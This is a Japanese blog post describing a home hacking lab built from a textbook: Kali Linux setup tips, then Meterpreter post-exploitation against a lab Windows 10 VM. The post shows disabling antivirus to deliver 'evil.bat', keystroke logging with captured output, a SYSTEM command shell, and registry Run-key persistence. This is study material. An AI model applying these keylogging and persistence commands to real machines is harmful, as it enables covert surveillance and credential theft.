LoginSignup
7
3

More than 3 years have passed since last update.

ハッキング・ラボのつくりかたで学んだこと

Last updated at Posted at 2020-12-17

目次

1、はじめに
2、環境
3、構築で詰まったこと
4、実施したこと
5、おわりに
6、参考資料

1、はじめに

ハッキング・ラボのつくりかたを行いました。
構築/学習で行ったことや詰まったところを紹介します。
詳細は、書籍をご参照ください。

2、環境

ホストOS:Windows10 Home
VirtualBox:6.0.16
ゲストOS(Linux):Kali Linux(2020.1) VirtulBox 64-bit版
ゲストOS(Windows):Windows10(May 2020 Update)

3、構築

構築については、実施手順を紹介すると長くなるため、詰まったところを紹介します。
下記の②~④に関しては、できていなくても実施に問題ないため、詰まったら飛ばしていいかもしれません。

①ログイン時

Kali Linux(2020.1)ではrootにパスワードが設定されていないため、ログインできません。
kali/kaliでログイン可能です。

②Linuxの設定について

Settings画面が異なるため、詰まりやすいです。
左上のKaliマークから検索します。
・画面設定→「Display」
・電源設定→「Xfce Power Manager」
・キーボード→「Keyboard」

③タイムゾーンについて

別で設定します。
右上の時刻「HH:SS PM」をクリック→「Properties」→「Clock」
→「Timezone」に「Asia/Tokyo」を入力

④日本語入力について

パッケージインストール前に「apt update」「apt upgrade」の実施が必要です。
また、インストール後に適用が必要です。
「sudo dpkg-reconfigure locales」→「ja_JP.UTF-8」の場所でスペースキーを押す
→「*」がつく→Enterキー「ja_JP.UTF-8」を選択してEnterキー→再起動

⑤IPアドレスを確認する際

ifconfigを使用できません。
「ip addr show」を使用します。
ルーティング確認時は、「ip route show」で行います。

4、実施したこと

まず、Windows10に侵入する。
ゲストのWindowsにて、リアルタイムスキャンを使用していると、「evil.bat」を入手できないため、停止しておく。

①キーロガー取得

Linux側でキースキャンをスタートします。

meterpreter > keyscan_start
Starting the keystroke sniffer ...

Windows側で下記のように入力します。

password

pcuser 1234

Linux側でdumpします。
下記のような形で結果が出ます。

meterpreter > keyscan_dump
Dumping captured keystrokes...
password<CR>
<CR>
pcuser 1234<^S>

meterpreter > 

②コマンドプロンプト操作

以下のコマンドからコマンドプロンプトに入ります。

meterpreter > shell

システム権限でコマンドプロンプトに入れば、何でもできます。
例えば、Webサイトや動画の再生を行うならば、以下のコマンドです。

C:\Windows\system32>start https://xxx.xxx.xxx/
C:\Windows\system32>start xxx.mp4

③レジストリの変更

Windowsのログイン時にInternetExplorerを起動するように設定します。
「HKLM\software\microsoft\windows\currentversion\run」に「explorer.exe」を設定します。

まず、値を確認します。

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (1):

    SecurityHealth

meterpreter > 

値を変更します。

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v explorer -d  'C:\Windows\explorer.exe'
Successfully set explorer of REG_SZ.
meterpreter >

値を確認して、「explorer.exe」が追加されていることを確認します。

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (2):

    SecurityHealth
    explorer

meterpreter > 

④スクリーンショット

以下のコマンドからWindowsのスクリーンショットを取得できます。

meterpreter > screenshot

5、おわりに

Meterpreterを中心に学習を行ったため、後半のLANやWebアプリ経由のハッキングを試してみたいです。
また、他のソフトウェアを使用したハッキングも試そうと思います。

6、参考資料

ハッキング・ラボのつくりかた(こちらはメイン資料です。)
実践 Metasploit(Meterpreterに関して詳しい。)

7
3
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
7
3